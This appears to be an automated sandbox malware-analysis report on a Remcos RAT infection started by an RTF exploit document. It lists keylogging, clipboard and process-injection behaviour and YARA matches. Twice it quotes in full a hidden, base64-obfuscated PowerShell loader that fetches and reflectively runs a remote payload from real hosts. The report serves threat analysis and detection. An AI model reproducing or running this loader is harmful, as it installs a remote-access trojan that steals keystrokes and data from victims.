                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49166
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49163
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49162
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49161
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49170
                Source: unknownNetwork traffic detected: HTTP traffic on port 49168 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49170 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49166 -> 443
                Source: unknownHTTPS traffic detected: 172.67.216.244:443 -> 192.168.2.22:49161 version: TLS 1.2

                Key, Mouse, Clipboard, Microphone and Screen Capturing

                barindex
                Contains functionality to register a low level keyboard hook
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_0040A2F3 SetWindowsHookExA 0000000D,0040A2DF,0000000013_2_0040A2F3
                Installs a global keyboard hook
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWindows user hook set: 0 keyboard low level C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_0040B749 OpenClipboard,GetClipboardData,CloseClipboard,13_2_0040B749
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_004168FC OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,13_2_004168FC
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_0040987A EmptyClipboard,wcslen,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,SetClipboardData,CloseClipboard,15_2_0040987A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_004098E2 EmptyClipboard,GetFileSize,GlobalAlloc,GlobalLock,ReadFile,GlobalUnlock,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,15_2_004098E2
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 16_2_00406DFC EmptyClipboard,GetFileSize,GlobalAlloc,GlobalLock,ReadFile,GlobalUnlock,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,16_2_00406DFC
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 16_2_00406E9F EmptyClipboard,strlen,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,SetClipboardData,CloseClipboard,16_2_00406E9F
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 17_2_004068B5 EmptyClipboard,GetFileSize,GlobalAlloc,GlobalLock,ReadFile,GlobalUnlock,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,17_2_004068B5
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 17_2_004072B5 EmptyClipboard,strlen,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,SetClipboardData,CloseClipboard,17_2_004072B5
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_0040B749 OpenClipboard,GetClipboardData,CloseClipboard,13_2_0040B749
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_0040A41B GetForegroundWindow,GetWindowThreadProcessId,GetKeyboardLayout,GetKeyState,GetKeyboardState,ToUnicodeEx,ToUnicodeEx,ToUnicodeEx,ToUnicodeEx,13_2_0040A41B
                Source: Yara matchFile source: 12.2.powershell.exe.3ab0b60.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 13.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 12.2.powershell.exe.3ab0b60.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 13.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000C.00000002.407906179.0000000003429000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000C.00000002.407906179.0000000003649000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 4004, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 2136, type: MEMORYSTR

                E-Banking Fraud

                barindex
                Yara detected Remcos RAT
                Source: Yara matchFile source: 12.2.powershell.exe.3ab0b60.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 13.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 12.2.powershell.exe.3ab0b60.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 13.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000D.00000002.919651598.0000000000321000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000C.00000002.407906179.0000000003429000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000C.00000002.407906179.0000000003649000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 4004, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 2136, type: MEMORYSTR
                Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\nor\logs.dat, type: DROPPED

                Spam, unwanted Advertisements and Ransom Demands

                barindex
                Contains functionalty to change the wallpaper
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_0041CA73 SystemParametersInfoW,13_2_0041CA73

                System Summary

                barindex
                Malicious sample detected (through community Yara rule)
                Source: 12.2.powershell.exe.3ab0b60.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                Source: 12.2.powershell.exe.3ab0b60.1.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                Source: 12.2.powershell.exe.3ab0b60.1.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                Source: 13.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                Source: 13.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                Source: 13.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                Source: 12.2.powershell.exe.3ab0b60.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                Source: 12.2.powershell.exe.3ab0b60.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                Source: 13.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                Source: 13.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                Source: 13.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                Source: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                Source: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Author: unknown
                Source: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                Source: 0000000C.00000002.407906179.0000000003429000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                Source: 0000000C.00000002.407906179.0000000003649000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                Source: Process Memory Space: powershell.exe PID: 3916, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                Source: Process Memory Space: powershell.exe PID: 4004, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                Source: Process Memory Space: powershell.exe PID: 4004, type: MEMORYSTRMatched rule: Detects Invoke-Mimikatz String Author: Florian Roth
                Source: Process Memory Space: powershell.exe PID: 4004, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                Source: Process Memory Space: RegAsm.exe PID: 2136, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\F971B2FE.doc, type: DROPPEDMatched rule: Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents. Author: ditekSHen
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\creambananacakegoodforladieswholovethebananasametimesheknowtheveryniceideadslawyasgetbackgreatthingswithme____securethingsareinthr[1].doc, type: DROPPEDMatched rule: Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents. Author: ditekSHen
                Microsoft Office drops suspicious files
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\9aubsm.urlJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\RN on 104.168.7.8.urlJump to behavior
                Windows Scripting host queries suspicious COM object (likely to drop second stage)
                Source: C:\Windows\SysWOW64\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}\ProgIDJump to behavior
                Wscript starts Powershell (via cmd or directly)
                Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LigoR1YgJyptRHIqJykubmFNZVszLDExLDJdLUpvaU4nJykoICgoJ3sxfXVybCA9IHswfWh0dCcrJ3BzJysnOi8nKycvcmF3LmcnKydpdCcrJ2h1YnVzZXJjb250JysnZW50JysnLmNvJysnbS9Ob0RlJysndGVjJysndE9uJysnL04nKydvRCcrJ2UnKyd0ZWN0JysnT24vcmVmcycrJy9oZWFkcy8nKydtYWluJysnL0RldGEnKydoTm8nKyd0aC1WLnR4dHswfTsgezEnKyd9JysnYicrJ2FzZTY0Q29udGVudCA9IChOZXcnKyctT2InKydqZWMnKyd0IFMnKyd5JysncycrJ3RlbS5OZXQnKycuV2ViJysnQ2xpZScrJ250KS4nKydEb3dubG8nKydhZFN0cicrJ2luZyh7JysnMX11JysncmwpOyB7MX1iJysnaW4nKydhcnlDb250ZW50ID0gWycrJ1N5c3QnKydlJysnbS4nKydDbycrJ252ZXInKyd0JysnXScrJzo6JysnRnJvbUJhJysnc2U2JysnNFMnKyd0JysncmknKyduZyh7JysnMScrJ31iYScrJ3NlJysnNjRDb250JysnZScrJ24nKyd0KTsgezF9YScrJ3NzZW1ibHkgPSBbJysnUmUnKydmbGVjdCcrJ2knKydvbicrJy4nKydBc3NlbScrJ2InKydseV0nKyc6OicrJ0xvJysnYWQoJysnezF9YicrJ2luYXInKyd5Q29udGUnKydudCk7IFtkbmwnKydpYi5JTy4nKydIb21lXScrJzo6JysnVkEnKydJKHsyfXR4JysndC5CR0YnKydSLycrJzAnKycxJysnNS84LjcuOCcrJzYxLjQwMS8vJysnOnB0dGh7Mn0sIHsnKycyJysnfScrJ2QnKydlc2EnKyd0aXZhZG97Mn0nKycsIHsyfWRlJysncycrJ2F0aXZhZCcrJ28nKyd7MicrJ30sIHsyJysnfWRlcycrJ2F0JysnaXZhJysnZG97JysnMn0nKycsIHsyfVInKydlJysnZ0FzbXsnKycyfSwgezInKyd9ezJ9LCcrJ3snKycyJysnfScrJ3syfSknKS1mIFtjSEFSXTM5LFtjSEFSXTM2LFtjSEFSXTM0KSk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
                Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LigoR1YgJyptRHIqJykubmFNZVszLDExLDJdLUpvaU4nJykoICgoJ3sxfXVybCA9IHswfWh0dCcrJ3BzJysnOi8nKycvcmF3LmcnKydpdCcrJ2h1YnVzZXJjb250JysnZW50JysnLmNvJysnbS9Ob0RlJysndGVjJysndE9uJysnL04nKydvRCcrJ2UnKyd0ZWN0JysnT24vcmVmcycrJy9oZWFkcy8nKydtYWluJysnL0RldGEnKydoTm8nKyd0aC1WLnR4dHswfTsgezEnKyd9JysnYicrJ2FzZTY0Q29udGVudCA9IChOZXcnKyctT2InKydqZWMnKyd0IFMnKyd5JysncycrJ3RlbS5OZXQnKycuV2ViJysnQ2xpZScrJ250KS4nKydEb3dubG8nKydhZFN0cicrJ2luZyh7JysnMX11JysncmwpOyB7MX1iJysnaW4nKydhcnlDb250ZW50ID0gWycrJ1N5c3QnKydlJysnbS4nKydDbycrJ252ZXInKyd0JysnXScrJzo6JysnRnJvbUJhJysnc2U2JysnNFMnKyd0JysncmknKyduZyh7JysnMScrJ31iYScrJ3NlJysnNjRDb250JysnZScrJ24nKyd0KTsgezF9YScrJ3NzZW1ibHkgPSBbJysnUmUnKydmbGVjdCcrJ2knKydvbicrJy4nKydBc3NlbScrJ2InKydseV0nKyc6OicrJ0xvJysnYWQoJysnezF9YicrJ2luYXInKyd5Q29udGUnKydudCk7IFtkbmwnKydpYi5JTy4nKydIb21lXScrJzo6JysnVkEnKydJKHsyfXR4JysndC5CR0YnKydSLycrJzAnKycxJysnNS84LjcuOCcrJzYxLjQwMS8vJysnOnB0dGh7Mn0sIHsnKycyJysnfScrJ2QnKydlc2EnKyd0aXZhZG97Mn0nKycsIHsyfWRlJysncycrJ2F0aXZhZCcrJ28nKyd7MicrJ30sIHsyJysnfWRlcycrJ2F0JysnaXZhJysnZG97JysnMn0nKycsIHsyfVInKydlJysnZ0FzbXsnKycyfSwgezInKyd9ezJ9LCcrJ3snKycyJysnfScrJ3syfSknKS1mIFtjSEFSXTM5LFtjSEFSXTM2LFtjSEFSXTM0KSk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxDJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess Stats: CPU usage > 49%
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEMemory allocated: 770B0000 page execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeMemory allocated: 770B0000 page execute and read and writeJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMemory allocated: 770B0000 page execute and read and writeJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMemory allocated: 770B0000 page execute and read and writeJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMemory allocated: 770B0000 page execute and read and writeJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMemory allocated: 770B0000 page execute and read and writeJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMemory allocated: 770B0000 page execute and read and writeJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMemory allocated: 770B0000 page execute and read and write
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMemory allocated: 770B0000 page execute and read and write
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_0041812A GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,CreateProcessW,VirtualAlloc,GetThreadContext,ReadProcessMemory,NtCreateSection,NtUnmapViewOfSection,NtMapViewOfSection,VirtualFree,NtClose,TerminateProcess,GetModuleHandleA,GetProcAddress,GetCurrentProcess,NtMapViewOfSection,WriteProcessMemory,SetThreadContext,ResumeThread,VirtualFree,GetCurrentProcess,NtUnmapViewOfSection,NtClose,TerminateProcess,GetLastError,13_2_0041812A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_0041330D OpenProcess,NtQueryInformationProcess,GetCurrentProcess,DuplicateHandle,GetFinalPathNameByHandleW,CloseHandle,CreateFileMappingW,MapViewOfFile,GetFileSize,UnmapViewOfFile,CloseHandle,CloseHandle,CloseHandle,13_2_0041330D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_0041BBC6 OpenProcess,NtResumeProcess,CloseHandle,13_2_0041BBC6
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_0041BB9A OpenProcess,NtSuspendProcess,CloseHandle,13_2_0041BB9A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,CloseHandle,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle,15_2_0040DD85
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_00401806 NtdllDefWindowProc_W,15_2_00401806
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_004018C0 NtdllDefWindowProc_W,15_2_004018C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 16_2_004016FD NtdllDefWindowProc_A,16_2_004016FD
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 16_2_004017B7 NtdllDefWindowProc_A,16_2_004017B7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 17_2_00402CAC NtdllDefWindowProc_A,17_2_00402CAC
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 17_2_00402D66 NtdllDefWindowProc_A,17_2_00402D66
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_004167EF ExitWindowsEx,LoadLibraryA,GetProcAddress,13_2_004167EF
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_0043706A13_2_0043706A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_0041400513_2_00414005
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_0043E11C13_2_0043E11C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_004541D913_2_004541D9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_004381E813_2_004381E8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_0041F18B13_2_0041F18B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_0044627013_2_00446270
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_0043E34B13_2_0043E34B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_004533AB13_2_004533AB
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_0042742E13_2_0042742E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_0043756613_2_00437566
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_0043E5A813_2_0043E5A8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_004387F013_2_004387F0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_0043797E13_2_0043797E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_004339D713_2_004339D7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_0044DA4913_2_0044DA49
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_00427AD713_2_00427AD7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_0041DBF313_2_0041DBF3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_00427C4013_2_00427C40
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_00437DB313_2_00437DB3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_00435EEB13_2_00435EEB
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_0043DEED13_2_0043DEED
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_00426E9F13_2_00426E9F
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_1001719413_2_10017194
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_1000B5C113_2_1000B5C1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_0044B04015_2_0044B040
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_0043610D15_2_0043610D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_0044731015_2_00447310
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_0044A49015_2_0044A490
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_0040755A15_2_0040755A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_0043C56015_2_0043C560
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_0044B61015_2_0044B610
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_0044D6C015_2_0044D6C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_004476F015_2_004476F0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_0044B87015_2_0044B870
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_0044081D15_2_0044081D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_0041495715_2_00414957
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_004079EE15_2_004079EE
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_00407AEB15_2_00407AEB
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_0044AA8015_2_0044AA80
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_00412AA915_2_00412AA9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_00404B7415_2_00404B74
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_00404B0315_2_00404B03
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_0044BBD815_2_0044BBD8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_00404BE515_2_00404BE5
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_00404C7615_2_00404C76
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_00415CFE15_2_00415CFE
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_00416D7215_2_00416D72
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_00446D3015_2_00446D30
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_00446D8B15_2_00446D8B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_00406E8F15_2_00406E8F
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 16_2_0040503816_2_00405038
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 16_2_0041208C16_2_0041208C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 16_2_004050A916_2_004050A9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 16_2_0040511A16_2_0040511A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 16_2_0043C13A16_2_0043C13A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 16_2_004051AB16_2_004051AB
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 16_2_0044930016_2_00449300
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 16_2_0040D32216_2_0040D322
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 16_2_0044A4F016_2_0044A4F0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 16_2_0043A5AB16_2_0043A5AB
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 16_2_0041363116_2_00413631
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 16_2_0044669016_2_00446690
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 16_2_0044A73016_2_0044A730
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 16_2_004398D816_2_004398D8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 16_2_004498E016_2_004498E0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 16_2_0044A88616_2_0044A886
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 16_2_0043DA0916_2_0043DA09
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 16_2_00438D5E16_2_00438D5E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 16_2_00449ED016_2_00449ED0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 16_2_0041FE8316_2_0041FE83
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 16_2_00430F5416_2_00430F54
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 17_2_004050C217_2_004050C2
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 17_2_004014AB17_2_004014AB
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 17_2_0040513317_2_00405133
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 17_2_004051A417_2_004051A4
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 17_2_0040124617_2_00401246
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 17_2_0040CA4617_2_0040CA46
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 17_2_0040523517_2_00405235
